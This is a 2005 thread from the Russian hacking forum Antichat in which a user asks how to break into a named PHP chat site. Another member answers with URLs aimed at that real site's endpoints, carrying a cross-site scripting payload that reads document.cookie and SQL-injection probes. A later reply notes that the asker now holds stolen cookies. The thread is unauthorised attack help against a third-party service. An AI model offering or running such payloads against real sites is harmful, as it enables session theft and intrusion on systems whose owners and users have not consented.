Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Чаты (https://forum.antichat.xyz/forumdisplay.php?f=10)
-   -   Какие есть уязвимости у чатов написанных на php? (https://forum.antichat.xyz/showthread.php?t=10601)

Va_RuS 07.11.2005 21:01

Какие есть уязвимости у чатов написанных на php?
 
Так вот мне интересно узнать, какие есть уязвимости для чатов на php.
Обычные пользователи ничего сделать немогут, но
админы и модеры могут вставлять картинки, писать большими биквами и т.п.

А обычный пользователь так сможет?
Можно ли взломать как-нибудь??

vectorg 07.11.2005 22:13

кидай сюда ссылку, я так понимаю что тебя определённый чат интересует?

все чаты разные => уязвимости тоже разные

Va_RuS 08.11.2005 20:33

Угу... вот ссылочка http://energyfm.ru/chat/

Va_RuS 09.11.2005 23:18

Ну так как сделать то?

vectorg 10.11.2005 00:48

дай логин и пароль а то у них там с регистрацией проблемы

Va_RuS 10.11.2005 00:52

чел свои не дам)) но у мя там ник завалялся... ща...
логин Vaz*****
пас **********
-----------------
за логином и пассом стучите в ПМ

XgLuiR 10.11.2005 10:16

Чат чемто похож на Бородинский

vectorg 10.11.2005 13:40

вот по быстрому нашёл...

http://energyfm.ru/chat/history.php?idchat=energy&what="><script>alert(doc ument.cookie)</script>
http://energyfm.ru/chat/history.php?idchat='
http://energyfm.ru/chat/getnewmes.php?idchat='

вот как сообщение выглядят в коде...

parent.window.tickerDiv.innerHTML+'<p style="color: br;"><b><font color="#0000FF">Vaz21043</font></b> : \'&lt;&gt;()\'&quot;</p>';

сдесь можно посмотреть все сообщения в коде...

http://energyfm.ru/chat/getnewmes.php?idchat=energy

не забудь про репутацию (слева плюсик нажми зелёненький) ;)

Va_RuS 10.11.2005 14:22

Слух, а до меня что-то не допело. А как пистаь большими буквами. под наклоном.. и т.п. ?

На плесик ОБЯЗАТЕЛЬНО нажму.

Tem 10.11.2005 15:11

зачем тебе это , у тебя куки имеются на руках )))


Время: 20:38